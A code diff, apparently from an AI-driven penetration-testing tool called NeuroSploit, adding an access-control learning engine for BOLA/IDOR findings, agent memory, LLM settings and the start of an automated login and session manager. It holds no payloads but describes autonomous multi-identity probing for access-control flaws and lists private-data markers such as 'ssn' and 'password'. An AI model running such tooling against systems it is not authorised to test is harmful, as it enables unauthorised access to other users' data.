async with async_session_factory() as db:
result = await db.execute(
select(VulnLabChallenge).where(VulnLabChallenge.id == challenge_id)
)
challenge = result.scalar_one_or_none()
if challenge:
challenge.status = "stopped"
challenge.completed_at = datetime.utcnow()
await db.commit()
except:
pass
if challenge_id in lab_results:
lab_results[challenge_id]["status"] = "stopped"
return {"message": "Challenge stopped"}
@router.delete("/challenges/{challenge_id}")
async def delete_challenge(challenge_id: str):
"""Delete a lab challenge record"""
# Stop if running
agent = lab_agents.get(challenge_id)
if agent:
agent.cancel()
lab_agents.pop(challenge_id, None)
lab_results.pop(challenge_id, None)
async with async_session_factory() as db:
result = await db.execute(
select(VulnLabChallenge).where(VulnLabChallenge.id == challenge_id)
)
challenge = result.scalar_one_or_none()
if not challenge:
raise HTTPException(status_code=404, detail="Challenge not found")
await db.delete(challenge)
await db.commit()
return {"message": "Challenge deleted"}
@router.get("/logs/{challenge_id}")
async def get_challenge_logs(challenge_id: str, limit: int = 200):
"""Get logs for a challenge (real-time or from DB)"""
# Check in-memory first for real-time data
mem = lab_results.get(challenge_id)
if mem:
all_logs = mem.get("logs", [])
return {
"challenge_id": challenge_id,
"total_logs": len(all_logs),
"logs": all_logs[-limit:],
"source": "realtime",
}
# Fall back to DB persisted logs
async with async_session_factory() as db:
result = await db.execute(
select(VulnLabChallenge).where(VulnLabChallenge.id == challenge_id)
)
challenge = result.scalar_one_or_none()
if not challenge:
raise HTTPException(status_code=404, detail="Challenge not found")
all_logs = challenge.logs or []
return {
"challenge_id": challenge_id,
"total_logs": len(all_logs),
"logs": all_logs[-limit:],
"source": "database",
}
+7
View File
@@ -32,8 +32,15 @@ class Settings(BaseSettings):
# LLM Settings
ANTHROPIC_API_KEY: Optional[str] = os.getenv("ANTHROPIC_API_KEY")
OPENAI_API_KEY: Optional[str] = os.getenv("OPENAI_API_KEY")
OPENROUTER_API_KEY: Optional[str] = os.getenv("OPENROUTER_API_KEY")
DEFAULT_LLM_PROVIDER: str = "claude"
DEFAULT_LLM_MODEL: str = "claude-sonnet-4-20250514"
MAX_OUTPUT_TOKENS: Optional[int] = None
ENABLE_MODEL_ROUTING: bool = False
# Feature Flags
ENABLE_KNOWLEDGE_AUGMENTATION: bool = False
ENABLE_BROWSER_VALIDATION: bool = False
# Scan Settings
MAX_CONCURRENT_SCANS: int = 3
+423
View File
@@ -0,0 +1,423 @@
"""
NeuroSploit v3 - Access Control Learning Engine
Adaptive learning system for BOLA/BFLA/IDOR and other access control testing.
Records test outcomes and response patterns to improve future evaluations.
Key insight: HTTP status codes are unreliable for access control testing.
This module learns from actual response DATA patterns to distinguish:
- True positives (cross-user data access)
- False positives (error messages, login pages, empty responses with 200 status)
Usage:
learner = AccessControlLearner()
# Record a test outcome
    learner.record_test(vuln_type, url, status_code, response_body, is_true_positive, pattern_notes)
# Get learned patterns for a target
patterns = learner.get_patterns_for_target(domain)
# Get learning context for AI prompts
context = learner.get_learning_context(vuln_type)
"""
import json
import logging
import re
from dataclasses import dataclass, field, asdict
from datetime import datetime
from pathlib import Path
from typing import Dict, List, Optional
logger = logging.getLogger(__name__)
DATA_DIR = Path(__file__).parent.parent.parent / "data"
LEARNING_FILE = DATA_DIR / "access_control_learning.json"
@dataclass
class ResponsePattern:
    """A learned response pattern from access control testing.

    Describes how a particular response "shape" should be interpreted
    (false positive vs true positive) when judging BOLA/BFLA/IDOR tests.
    """
    pattern_type: str  # "denial", "empty", "login_page", "data_leak", "public_data"
    indicators: List[str]  # Strings/patterns that identify this response type
    is_false_positive: bool  # True if this pattern indicates a false positive
    confidence: float  # 0.0-1.0 how reliable this pattern is
    example_body: str  # Truncated example response body
    vuln_type: str  # bola, bfla, idor, etc.
    target_domain: str  # Domain this was learned from
    timestamp: str  # When this was learned (ISO-8601)
@dataclass
class TestRecord:
    """Record of an access control test outcome."""
    vuln_type: str  # bola, bfla, idor, etc.
    target_url: str  # URL that was tested
    status_code: int  # HTTP status of the response under evaluation
    response_length: int  # length of the response body in characters
    is_true_positive: bool  # verified outcome of the test
    pattern_type: str  # What pattern was identified
    key_indicators: List[str]  # What strings/patterns were decisive
    notes: str  # Human or AI notes about why this was TP/FP
    timestamp: str  # When the test was recorded (ISO-8601)
class AccessControlLearner:
    """Adaptive learning engine for access control vulnerability testing.

    Learns from test outcomes to identify response patterns that indicate
    true vs false positives for BOLA, BFLA, IDOR, and related vuln types.

    Records and learned patterns are persisted best-effort to
    ``<data_dir>/access_control_learning.json``; load/save failures are
    logged at debug level and never raised.
    """

    # Caps applied when persisting to disk (oldest entries dropped first)
    MAX_RECORDS = 500
    MAX_PATTERNS = 200

    # Pre-seeded patterns from known false positive scenarios
    DEFAULT_PATTERNS: List[Dict] = [
        {
            "pattern_type": "denial_200",
            "indicators": ["unauthorized", "forbidden", "access denied", "not authorized",
                           "permission denied", "insufficient privileges"],
            "is_false_positive": True,
            "confidence": 0.9,
            "description": "Server returns 200 OK but body contains access denial message",
        },
        {
            "pattern_type": "empty_200",
            "indicators": ["[]", "{}", '""', "null", ""],
            "is_false_positive": True,
            "confidence": 0.85,
            "description": "Server returns 200 OK with empty/null response body",
        },
        {
            "pattern_type": "login_redirect",
            "indicators": ["type=\"password\"", "sign in", "log in", "login",
                           "authentication required"],
            "is_false_positive": True,
            "confidence": 0.95,
            "description": "Server returns 200 OK but body is a login page",
        },
        {
            "pattern_type": "error_json",
            "indicators": ['"error":', '"status":"error"', '"success":false',
                           '"message":"not found"', '"code":401', '"code":403'],
            "is_false_positive": True,
            "confidence": 0.9,
            "description": "Server returns 200 OK but JSON body indicates error",
        },
        {
            "pattern_type": "own_data",
            "indicators": [],
            "is_false_positive": True,
            "confidence": 0.8,
            "description": "Server returns authenticated user's own data regardless of requested ID",
        },
        {
            "pattern_type": "public_data",
            "indicators": [],
            "is_false_positive": True,
            "confidence": 0.7,
            "description": "Response contains only public profile fields (username, bio) not private data",
        },
        {
            "pattern_type": "cross_user_data",
            "indicators": ['"email":', '"phone":', '"address":', '"ssn":',
                           '"credit_card":', '"password":', '"secret":'],
            "is_false_positive": False,
            "confidence": 0.9,
            "description": "Response contains another user's private data fields",
        },
        {
            "pattern_type": "admin_data_leak",
            "indicators": ['"role":"admin"', '"is_admin":true', '"users":[',
                           '"audit_log":', '"system_config":'],
            "is_false_positive": False,
            "confidence": 0.9,
            "description": "Response contains admin-level data accessible to non-admin user",
        },
        {
            "pattern_type": "state_change",
            "indicators": ['"updated":', '"deleted":', '"created":', '"modified":',
                           '"success":true'],
            "is_false_positive": False,
            "confidence": 0.85,
            "description": "Write operation succeeded on another user's resource",
        },
    ]

    # Known application patterns that cause false positives
    KNOWN_FP_PATTERNS: Dict[str, List[str]] = {
        "wso2": ["wso2", "carbon", "identity server", "api manager"],
        "keycloak": ["keycloak", "red hat sso"],
        "spring_security": ["spring security", "whitelabel error"],
        "oauth2_proxy": ["oauth2-proxy", "sign in with"],
        "cloudflare": ["cloudflare", "cf-ray", "attention required"],
        "aws_waf": ["aws-waf", "request blocked"],
    }

    def __init__(self, data_dir: Optional[Path] = None):
        """Initialize stores and load any previously persisted learning data."""
        self.data_dir = data_dir or DATA_DIR
        self.learning_file = self.data_dir / "access_control_learning.json"
        # String annotations: sibling dataclasses are defined at module level
        self.records: "List[TestRecord]" = []
        self.custom_patterns: "List[ResponsePattern]" = []
        self._load()

    def _load(self):
        """Load learning data from disk (best-effort; never raises)."""
        try:
            if self.learning_file.exists():
                with open(self.learning_file, "r") as f:
                    data = json.load(f)
                self.records = [
                    TestRecord(**r) for r in data.get("records", [])
                ]
                self.custom_patterns = [
                    ResponsePattern(**p) for p in data.get("patterns", [])
                ]
                logger.debug(f"Loaded {len(self.records)} records, {len(self.custom_patterns)} patterns")
        except Exception as e:
            logger.debug(f"Failed to load learning data: {e}")

    def _save(self):
        """Save learning data to disk (best-effort; never raises).

        Only the newest MAX_RECORDS / MAX_PATTERNS entries are written;
        metadata keeps the true (unbounded) counts.
        """
        try:
            self.data_dir.mkdir(parents=True, exist_ok=True)
            data = {
                "records": [asdict(r) for r in self.records[-self.MAX_RECORDS:]],
                "patterns": [asdict(p) for p in self.custom_patterns[-self.MAX_PATTERNS:]],
                "metadata": {
                    "total_records": len(self.records),
                    "total_patterns": len(self.custom_patterns),
                    "last_updated": datetime.now().isoformat(),
                },
            }
            with open(self.learning_file, "w") as f:
                json.dump(data, f, indent=2)
        except Exception as e:
            logger.debug(f"Failed to save learning data: {e}")

    def record_test(
        self,
        vuln_type: str,
        target_url: str,
        status_code: int,
        response_body: str,
        is_true_positive: bool,
        pattern_notes: str = "",
    ):
        """Record an access control test outcome for learning.

        Called after the validation judge makes a decision, with the
        verified outcome (true positive or false positive). May learn a
        new domain-specific pattern and auto-saves every 10 records.
        """
        # Identify response pattern
        pattern_type = self._classify_response(response_body, status_code)
        key_indicators = self._extract_key_indicators(response_body)
        record = TestRecord(
            vuln_type=vuln_type,
            target_url=target_url,
            status_code=status_code,
            response_length=len(response_body),
            is_true_positive=is_true_positive,
            pattern_type=pattern_type,
            key_indicators=key_indicators[:10],
            notes=pattern_notes[:500],
            timestamp=datetime.now().isoformat(),
        )
        self.records.append(record)
        # Learn new pattern if we have enough data
        self._maybe_learn_pattern(record, response_body)
        # Auto-save periodically
        if len(self.records) % 10 == 0:
            self._save()

    def _classify_response(self, body: str, status: int) -> str:
        """Classify the response into a pattern type.

        Checks, in priority order: empty body, denial message, login
        page, and private-data fields. Requires at least two matching
        indicators before committing to a classification.
        """
        body_lower = body.lower().strip()
        if len(body_lower) < 10:
            return "empty_200"
        # Check for denial indicators
        denial = ["unauthorized", "forbidden", "access denied", "not authorized",
                  "permission denied", '"error":', '"success":false']
        if sum(1 for d in denial if d in body_lower) >= 2:
            return "denial_200"
        # Check for login page (renamed loop var from `l`, which shadows and is hard to read)
        login = ["type=\"password\"", "sign in", "log in", "<form"]
        if sum(1 for marker in login if marker in body_lower) >= 2:
            return "login_redirect"
        # Check for data fields
        data = ['"email":', '"name":', '"phone":', '"address":',
                '"role":', '"password":', '"token":']
        if sum(1 for d in data if d in body_lower) >= 2:
            return "cross_user_data" if status == 200 else "blocked_data"
        return "unknown"

    def _extract_key_indicators(self, body: str) -> List[str]:
        """Extract key string indicators (JSON keys + boolean flags) from the response."""
        indicators = []
        body_lower = body.lower()
        # Check for JSON keys (first 2000 chars only, to bound work)
        json_keys = re.findall(r'"(\w+)":', body[:2000])
        indicators.extend(json_keys[:10])
        # Check for specific patterns
        patterns = {
            "has_email": '"email":' in body_lower,
            "has_name": '"name":' in body_lower,
            "has_error": '"error":' in body_lower,
            "has_success_false": '"success":false' in body_lower or '"success": false' in body_lower,
            "has_login_form": 'type="password"' in body_lower,
            "is_empty_array": body.strip() in ("[]", "{}"),
            "has_html_form": "<form" in body_lower,
        }
        for key, present in patterns.items():
            if present:
                indicators.append(key)
        return indicators

    def _maybe_learn_pattern(self, record: "TestRecord", body: str):
        """Learn a new domain-specific pattern from a test record, if novel."""
        # Local import: urllib is not needed anywhere else in this module
        from urllib.parse import urlparse
        domain = urlparse(record.target_url).netloc
        body_excerpt = body[:500]
        # Check if we already know this pattern for this domain
        known = any(
            p.target_domain == domain
            and p.pattern_type == record.pattern_type
            and p.vuln_type == record.vuln_type
            for p in self.custom_patterns
        )
        if known:
            return
        # Learn new domain-specific pattern
        pattern = ResponsePattern(
            pattern_type=record.pattern_type,
            indicators=record.key_indicators,
            is_false_positive=not record.is_true_positive,
            confidence=0.7,  # Start with moderate confidence
            example_body=body_excerpt,
            vuln_type=record.vuln_type,
            target_domain=domain,
            timestamp=record.timestamp,
        )
        self.custom_patterns.append(pattern)

    def get_patterns_for_target(self, domain: str) -> "List[ResponsePattern]":
        """Get learned patterns for a specific target domain."""
        return [
            p for p in self.custom_patterns
            if p.target_domain == domain
        ]

    def get_false_positive_rate(self, vuln_type: str) -> float:
        """Get the false positive rate for a vuln type from historical data.

        Returns 0.5 when there is no data (maximum uncertainty).
        """
        type_records = [r for r in self.records if r.vuln_type == vuln_type]
        if not type_records:
            return 0.5  # No data -> assume 50%
        fp_count = sum(1 for r in type_records if not r.is_true_positive)
        return fp_count / len(type_records)

    def get_learning_context(self, vuln_type: str, domain: str = "") -> str:
        """Generate learning context for AI prompts.

        Returns a formatted string with learned patterns and statistics
        that can be injected into LLM prompts to improve access control
        testing; returns "" when nothing has been learned.
        """
        parts = []
        # Historical stats
        type_records = [r for r in self.records if r.vuln_type == vuln_type]
        if type_records:
            total = len(type_records)
            tp = sum(1 for r in type_records if r.is_true_positive)
            fp = total - tp
            parts.append(
                f"Historical {vuln_type} testing: {total} tests, "
                f"{tp} true positives ({100*tp/total:.0f}%), "
                f"{fp} false positives ({100*fp/total:.0f}%)"
            )
            # Most common FP patterns
            fp_patterns = [r.pattern_type for r in type_records if not r.is_true_positive]
            if fp_patterns:
                from collections import Counter
                common = Counter(fp_patterns).most_common(3)
                pattern_str = ", ".join(f"{p} ({c}x)" for p, c in common)
                parts.append(f"Common false positive patterns: {pattern_str}")
        # Domain-specific patterns
        if domain:
            domain_patterns = self.get_patterns_for_target(domain)
            if domain_patterns:
                for p in domain_patterns[:5]:
                    status = "FALSE POSITIVE" if p.is_false_positive else "TRUE POSITIVE"
                    parts.append(
                        f"Known pattern for {domain}: {p.pattern_type} = {status} "
                        f"(confidence: {p.confidence:.0%})"
                    )
        # Known application FP patterns
        if domain:
            for app_name, indicators in self.KNOWN_FP_PATTERNS.items():
                if any(i in domain.lower() for i in indicators):
                    # FIX: the two f-string fragments used to concatenate with no
                    # separator, producing e.g. "use keycloakknown for ..."
                    parts.append(
                        f"WARNING: Target appears to use {app_name}, "
                        f"known for producing false positive access control findings"
                    )
        if not parts:
            return ""
        return "## Learned Access Control Patterns\n" + "\n".join(f"- {p}" for p in parts)

    def get_evaluation_hints(self, vuln_type: str, response_body: str, status: int) -> Dict:
        """Get evaluation hints for a specific response.

        Returns a dict of signals (pattern type, indicator list, FP/TP
        votes) that can help the validation judge or AI make better
        decisions about a candidate finding.
        """
        pattern_type = self._classify_response(response_body, status)
        indicators = self._extract_key_indicators(response_body)
        body_lower = response_body.lower()  # hoisted: avoid re-lowering per pattern
        # Check against default patterns
        matching_default = [
            p for p in self.DEFAULT_PATTERNS
            if any(i.lower() in body_lower for i in p["indicators"] if i)
        ]
        # Check against learned patterns
        matching_learned = [
            p for p in self.custom_patterns
            if p.vuln_type == vuln_type and p.pattern_type == pattern_type
        ]
        fp_signals = sum(
            1 for p in matching_default if p["is_false_positive"]
        ) + sum(
            1 for p in matching_learned if p.is_false_positive
        )
        tp_signals = sum(
            1 for p in matching_default if not p["is_false_positive"]
        ) + sum(
            1 for p in matching_learned if not p.is_false_positive
        )
        return {
            "pattern_type": pattern_type,
            "indicators": indicators,
            "fp_signals": fp_signals,
            "tp_signals": tp_signals,
            "likely_false_positive": fp_signals > tp_signals,
            "matching_patterns": len(matching_default) + len(matching_learned),
        }
+401
View File
@@ -0,0 +1,401 @@
"""
NeuroSploit v3 - Agent Memory Management
Bounded, deduplicated memory architecture for the autonomous agent.
Replaces ad-hoc self.findings / self.tested_payloads with structured,
eviction-aware data stores.
Inspired by XBOW benchmark methodology: every finding must have
real HTTP evidence, duplicates are suppressed, baselines are cached.
"""
import hashlib
import re
from dataclasses import dataclass, field, asdict
from datetime import datetime
from typing import Dict, List, Optional, Any, Set
from collections import OrderedDict
from urllib.parse import urlparse
# ---------------------------------------------------------------------------
# Data classes
# ---------------------------------------------------------------------------
@dataclass
class TestedCombination:
    """Record of a (url, param, vuln_type) test attempt"""
    url: str
    param: str
    vuln_type: str
    payloads_used: List[str] = field(default_factory=list)  # up to 10 payloads kept by AgentMemory
    was_vulnerable: bool = False
    tested_at: str = ""  # ISO-8601 UTC timestamp, auto-filled on creation
    def __post_init__(self):
        # Stamp creation time when the caller did not supply one.
        if not self.tested_at:
            self.tested_at = datetime.utcnow().isoformat()
@dataclass
class EndpointFingerprint:
    """Fingerprint of an endpoint's normal response"""
    url: str
    status_code: int = 0
    content_type: str = ""
    body_length: int = 0
    body_hash: str = ""  # MD5 of the body (change detection, not security)
    server_header: str = ""  # value of the Server response header, if any
    powered_by: str = ""  # value of the X-Powered-By response header, if any
    error_patterns: List[str] = field(default_factory=list)  # error regexes that matched in the body
    tech_headers: Dict[str, str] = field(default_factory=dict)  # tech-revealing headers (Server, X-Powered-By, ...)
    fingerprinted_at: str = ""  # ISO-8601 UTC timestamp, auto-filled on creation
    def __post_init__(self):
        # Stamp creation time when the caller did not supply one.
        if not self.fingerprinted_at:
            self.fingerprinted_at = datetime.utcnow().isoformat()
@dataclass
class RejectedFinding:
    """Audit trail for rejected findings"""
    finding_hash: str  # dedup hash computed by AgentMemory._finding_hash
    vuln_type: str
    endpoint: str
    param: str
    reason: str  # why the finding was rejected (e.g. speculative evidence)
    rejected_at: str = ""  # ISO-8601 UTC timestamp, auto-filled on creation
    def __post_init__(self):
        # Stamp creation time when the caller did not supply one.
        if not self.rejected_at:
            self.rejected_at = datetime.utcnow().isoformat()
# ---------------------------------------------------------------------------
# Speculative language patterns (anti-hallucination)
# ---------------------------------------------------------------------------
# Matches hedging phrases ("could be", "might be", "potentially vulnerable", ...)
# in finding evidence; AgentMemory.add_finding rejects findings whose evidence
# contains such speculative language instead of observed behavior.
SPECULATIVE_PATTERNS = re.compile(
    r"\b(could be|might be|may be|theoretically|potentially vulnerable|"
    r"possibly|appears to be vulnerable|suggests? (a )?vulnerab|"
    r"it is possible|in theory|hypothetically)\b",
    re.IGNORECASE
)
# ---------------------------------------------------------------------------
# AgentMemory
# ---------------------------------------------------------------------------
class AgentMemory:
    """
    Bounded memory store for the autonomous agent.

    All containers have hard caps. When a cap is reached, the oldest 25%
    of entries are evicted (LRU-style). Findings are deduplicated by a
    (vuln_type, scope, parameter) hash; domain-wide issues (e.g. missing
    security headers) are scoped per-domain rather than per-URL.
    """

    # Capacity limits
    MAX_TESTED = 10_000
    MAX_BASELINES = 500
    MAX_FINGERPRINTS = 500
    MAX_CONFIRMED = 200
    MAX_REJECTED = 500

    # Domain-scoped types: only 1 finding per domain (not per URL)
    DOMAIN_SCOPED_TYPES = {
        # Infrastructure / headers
        "security_headers", "clickjacking", "insecure_http_headers",
        "missing_xcto", "missing_csp", "missing_hsts",
        "missing_referrer_policy", "missing_permissions_policy",
        "cors_misconfig", "insecure_cors_policy", "ssl_issues", "weak_tls_config",
        "http_methods", "unrestricted_http_methods",
        # Server config
        "debug_mode", "debug_mode_enabled", "verbose_error_messages",
        "directory_listing", "directory_listing_enabled",
        "exposed_admin_panel", "exposed_api_docs", "insecure_cookie_flags",
        # Data exposure
        "cleartext_transmission", "sensitive_data_exposure",
        "information_disclosure", "version_disclosure",
        "weak_encryption", "weak_hashing", "weak_random",
        # Auth config
        "missing_mfa", "weak_password_policy", "weak_password",
        # Cloud/API
        "graphql_introspection", "rest_api_versioning", "api_rate_limiting",
    }

    def __init__(self):
        # Core stores (OrderedDict: insertion order doubles as LRU eviction order).
        # String annotations: the value dataclasses are defined at module level.
        self.tested_combinations: "OrderedDict[str, TestedCombination]" = OrderedDict()
        self.baseline_responses: "OrderedDict[str, dict]" = OrderedDict()
        self.endpoint_fingerprints: "OrderedDict[str, EndpointFingerprint]" = OrderedDict()
        # Findings
        self.confirmed_findings: List[Any] = []  # List[Finding] - uses agent's Finding dataclass
        self._finding_hashes: Set[str] = set()  # fast dedup lookup
        # Audit trail
        self.rejected_findings: "List[RejectedFinding]" = []
        # Technology stack detected across all endpoints
        self.technology_stack: Dict[str, str] = {}  # e.g. {"server": "Apache", "x-powered-by": "PHP/8.1"}

    # ------------------------------------------------------------------
    # Tested-combination tracking
    # ------------------------------------------------------------------
    @staticmethod
    def _test_key(url: str, param: str, vuln_type: str) -> str:
        """Deterministic key for a (url, param, vuln_type) tuple"""
        return hashlib.sha256(f"{url}|{param}|{vuln_type}".encode()).hexdigest()

    def was_tested(self, url: str, param: str, vuln_type: str) -> bool:
        """Check whether this combination was already tested"""
        return self._test_key(url, param, vuln_type) in self.tested_combinations

    def record_test(
        self, url: str, param: str, vuln_type: str,
        payloads: List[str], was_vulnerable: bool = False
    ):
        """Record a completed test"""
        key = self._test_key(url, param, vuln_type)
        self.tested_combinations[key] = TestedCombination(
            url=url, param=param, vuln_type=vuln_type,
            payloads_used=payloads[:10],  # store up to 10 payloads
            was_vulnerable=was_vulnerable,
        )
        self._enforce_limit(self.tested_combinations, self.MAX_TESTED)

    # ------------------------------------------------------------------
    # Baseline caching
    # ------------------------------------------------------------------
    @staticmethod
    def _baseline_key(url: str) -> str:
        """Key for baseline storage (strip query params for reuse).

        Uses the module-level urlparse import (the old local re-import
        was redundant).
        """
        parsed = urlparse(url)
        return f"{parsed.scheme}://{parsed.netloc}{parsed.path}"

    def store_baseline(self, url: str, response: dict):
        """Cache a baseline (clean) response for a URL"""
        key = self._baseline_key(url)
        body = response.get("body", "")
        self.baseline_responses[key] = {
            "status": response.get("status", 0),
            "content_type": response.get("content_type", ""),
            "body_length": len(body),
            # md5 is fine here: used for change detection, not security
            "body_hash": hashlib.md5(body.encode("utf-8", errors="replace")).hexdigest(),
            "body": body[:5000],  # store first 5k chars for comparison
            "headers": response.get("headers", {}),
            "fetched_at": datetime.utcnow().isoformat(),
        }
        self._enforce_limit(self.baseline_responses, self.MAX_BASELINES)

    def get_baseline(self, url: str) -> Optional[dict]:
        """Retrieve cached baseline for a URL"""
        key = self._baseline_key(url)
        baseline = self.baseline_responses.get(key)
        if baseline:
            # Move to end (mark as recently used)
            self.baseline_responses.move_to_end(key)
        return baseline

    # ------------------------------------------------------------------
    # Endpoint fingerprinting
    # ------------------------------------------------------------------
    def store_fingerprint(self, url: str, response: dict):
        """Extract and store endpoint fingerprint from a response.

        Also folds technology-revealing headers into the global
        technology_stack map.
        """
        key = self._baseline_key(url)
        headers = response.get("headers", {})
        body = response.get("body", "")
        # Detect error patterns in the body.
        # FIX: search the raw body case-insensitively. The previous code
        # lowercased the body first, so the mixed-case patterns
        # "<b>(?:Warning|Fatal error|Notice)</b>" and "Internal Server Error"
        # could never match.
        error_patterns = []
        error_regexes = [
            r"(?:sql|database|query)\s*(?:error|syntax|exception)",
            r"(?:warning|fatal|parse)\s*(?:error|exception)",
            r"stack\s*trace",
            r"traceback\s*\(most recent",
            r"<b>(?:Warning|Fatal error|Notice)</b>",
            r"Internal Server Error",
        ]
        haystack = body or ""
        for pat in error_regexes:
            if re.search(pat, haystack, re.IGNORECASE):
                error_patterns.append(pat)
        fp = EndpointFingerprint(
            url=url,
            status_code=response.get("status", 0),
            content_type=response.get("content_type", ""),
            body_length=len(body),
            body_hash=hashlib.md5(body.encode("utf-8", errors="replace")).hexdigest(),
            server_header=headers.get("server", headers.get("Server", "")),
            powered_by=headers.get("x-powered-by", headers.get("X-Powered-By", "")),
            error_patterns=error_patterns,
            tech_headers={
                k: v for k, v in headers.items()
                if k.lower() in (
                    "server", "x-powered-by", "x-aspnet-version",
                    "x-generator", "x-drupal-cache", "x-framework",
                )
            },
        )
        self.endpoint_fingerprints[key] = fp
        self._enforce_limit(self.endpoint_fingerprints, self.MAX_FINGERPRINTS)
        # Update global tech stack
        if fp.server_header:
            self.technology_stack["server"] = fp.server_header
        if fp.powered_by:
            self.technology_stack["x-powered-by"] = fp.powered_by
        for k, v in fp.tech_headers.items():
            self.technology_stack[k.lower()] = v

    def get_fingerprint(self, url: str) -> "Optional[EndpointFingerprint]":
        """Retrieve fingerprint for a URL"""
        key = self._baseline_key(url)
        return self.endpoint_fingerprints.get(key)

    # ------------------------------------------------------------------
    # Finding management (dedup + bounded)
    # ------------------------------------------------------------------
    @staticmethod
    def _finding_hash(finding) -> str:
        """Compute dedup hash for a finding.

        For domain-scoped types, uses scheme://netloc instead of full URL
        so the same missing header isn't reported per-URL.
        """
        vuln_type = finding.vulnerability_type
        endpoint = finding.affected_endpoint
        if vuln_type in AgentMemory.DOMAIN_SCOPED_TYPES:
            parsed = urlparse(endpoint)
            scope_key = f"{parsed.scheme}://{parsed.netloc}"
        else:
            scope_key = endpoint
        raw = f"{vuln_type}|{scope_key}|{finding.parameter}"
        return hashlib.sha256(raw.encode()).hexdigest()

    def _find_existing(self, finding) -> Optional[Any]:
        """Find an existing confirmed finding with the same dedup hash."""
        fh = self._finding_hash(finding)
        if fh not in self._finding_hashes:
            return None
        for f in self.confirmed_findings:
            if self._finding_hash(f) == fh:
                return f
        return None

    def add_finding(self, finding) -> bool:
        """
        Add a confirmed finding. Returns False if:
        - duplicate (same vuln_type + endpoint + param)
        - at capacity
        - evidence is missing or speculative

        For domain-scoped types, duplicates append the URL to
        the existing finding's affected_urls list instead.
        """
        fh = self._finding_hash(finding)
        # Dedup check - for domain-scoped types, merge URLs
        if fh in self._finding_hashes:
            if finding.vulnerability_type in self.DOMAIN_SCOPED_TYPES:
                existing = self._find_existing(finding)
                if existing and hasattr(existing, "affected_urls"):
                    url = finding.affected_endpoint
                    if url and url not in existing.affected_urls:
                        existing.affected_urls.append(url)
            return False
        # Capacity check
        if len(self.confirmed_findings) >= self.MAX_CONFIRMED:
            return False
        # Evidence quality check: a finding must carry real HTTP evidence
        if not finding.evidence and not finding.response:
            return False
        # Speculative language check (anti-hallucination)
        if finding.evidence and SPECULATIVE_PATTERNS.search(finding.evidence):
            self.reject_finding(finding, "Speculative language in evidence")
            return False
        self.confirmed_findings.append(finding)
        self._finding_hashes.add(fh)
        return True

    def reject_finding(self, finding, reason: str):
        """Record a rejected finding for audit"""
        self.rejected_findings.append(RejectedFinding(
            finding_hash=self._finding_hash(finding),
            vuln_type=getattr(finding, "vulnerability_type", "unknown"),
            endpoint=getattr(finding, "affected_endpoint", ""),
            param=getattr(finding, "parameter", ""),
            reason=reason,
        ))
        if len(self.rejected_findings) > self.MAX_REJECTED:
            # Evict oldest 25%
            cut = self.MAX_REJECTED // 4
            self.rejected_findings = self.rejected_findings[cut:]

    def has_finding_for(self, vuln_type: str, endpoint: str, param: str = "") -> bool:
        """Check if a confirmed finding already exists for this combo.

        Uses domain-scoped key for domain-scoped types.
        """
        if vuln_type in self.DOMAIN_SCOPED_TYPES:
            parsed = urlparse(endpoint)
            scope_key = f"{parsed.scheme}://{parsed.netloc}"
        else:
            scope_key = endpoint
        raw = f"{vuln_type}|{scope_key}|{param}"
        fh = hashlib.sha256(raw.encode()).hexdigest()
        return fh in self._finding_hashes

    # ------------------------------------------------------------------
    # Eviction helper
    # ------------------------------------------------------------------
    @staticmethod
    def _enforce_limit(od: OrderedDict, limit: int):
        """Evict oldest 25% when limit is exceeded"""
        if len(od) <= limit:
            return
        to_remove = limit // 4
        for _ in range(to_remove):
            od.popitem(last=False)  # pop oldest

    # ------------------------------------------------------------------
    # Stats / introspection
    # ------------------------------------------------------------------
    def stats(self) -> dict:
        """Return memory usage statistics"""
        return {
            "tested_combinations": len(self.tested_combinations),
            "baseline_responses": len(self.baseline_responses),
            "endpoint_fingerprints": len(self.endpoint_fingerprints),
            "confirmed_findings": len(self.confirmed_findings),
            "rejected_findings": len(self.rejected_findings),
            "technology_stack": dict(self.technology_stack),
            "limits": {
                "tested": self.MAX_TESTED,
                "baselines": self.MAX_BASELINES,
                "fingerprints": self.MAX_FINGERPRINTS,
                "confirmed": self.MAX_CONFIRMED,
                "rejected": self.MAX_REJECTED,
            },
        }

    def clear(self):
        """Reset all memory stores"""
        self.tested_combinations.clear()
        self.baseline_responses.clear()
        self.endpoint_fingerprints.clear()
        self.confirmed_findings.clear()
        self._finding_hashes.clear()
        self.rejected_findings.clear()
        self.technology_stack.clear()
+596
View File
@@ -0,0 +1,596 @@
"""
NeuroSploit v3 - Authentication Manager
Autonomous login, session management, multi-user context for
BOLA/BFLA/IDOR testing. Handles login form detection, CSRF extraction,
credential management, and session refresh.
"""
import logging
import re
import time
from dataclasses import dataclass, field
from datetime import datetime
from typing import Callable, Dict, List, Optional, Any
from urllib.parse import urlparse, urljoin
logger = logging.getLogger(__name__)
@dataclass
class Credentials:
    """A set of credentials for testing (provided, discovered, or default)."""
    username: str
    password: str
    role: str = "user"  # user, admin
    source: str = "provided"  # provided, discovered, default
@dataclass
class SessionContext:
    """Authentication session state for one test identity.

    Carries the cookies/tokens/headers needed to replay authenticated
    requests, plus a simple lifecycle state.
    """
    name: str  # "user_a", "user_b", "admin"
    role: str  # user, admin
    cookies: Dict[str, str] = field(default_factory=dict)
    tokens: Dict[str, str] = field(default_factory=dict)  # bearer, jwt, api_key
    headers: Dict[str, str] = field(default_factory=dict)  # Authorization: Bearer xxx
    state: str = "unauthenticated"  # unauthenticated, authenticating, authenticated, expired
    login_time: Optional[float] = None  # set on login; presumably epoch seconds — confirm in login flow
    credential: Optional[Credentials] = None  # credentials this session was established with
    login_url: Optional[str] = None  # URL the login was performed against
    session_duration: float = 3600.0  # Estimated session lifetime (1 hour default)
@dataclass
class LoginForm:
    """Detected login form.

    Produced by AuthManager.detect_login_forms from page HTML; confidence
    (0.0-1.0) reflects how strongly the form resembles a login form.
    """
    url: str  # Form action URL
    method: str  # POST usually
    username_field: str  # name attribute of username input
    password_field: str  # name attribute of password input
    csrf_field: Optional[str] = None  # name of the CSRF input, if detected
    csrf_value: Optional[str] = None  # value of the CSRF input, if detected
    extra_fields: Dict[str, str] = field(default_factory=dict)  # other hidden fields to submit
    confidence: float = 0.0  # score assigned during detection
class AuthManager:
"""Autonomous authentication manager.
Manages login automation, session tracking, and multi-user
contexts for access control vulnerability testing.
Features:
- Login form detection from HTML
- CSRF token extraction
- Credential management (provided + discovered)
- Session state machine (unauthenticated -> authenticated -> expired)
- Multi-user contexts for BOLA/BFLA/IDOR testing
- Auto session refresh on expiry detection
- Token extraction from responses (JWT, Bearer, API keys)
"""
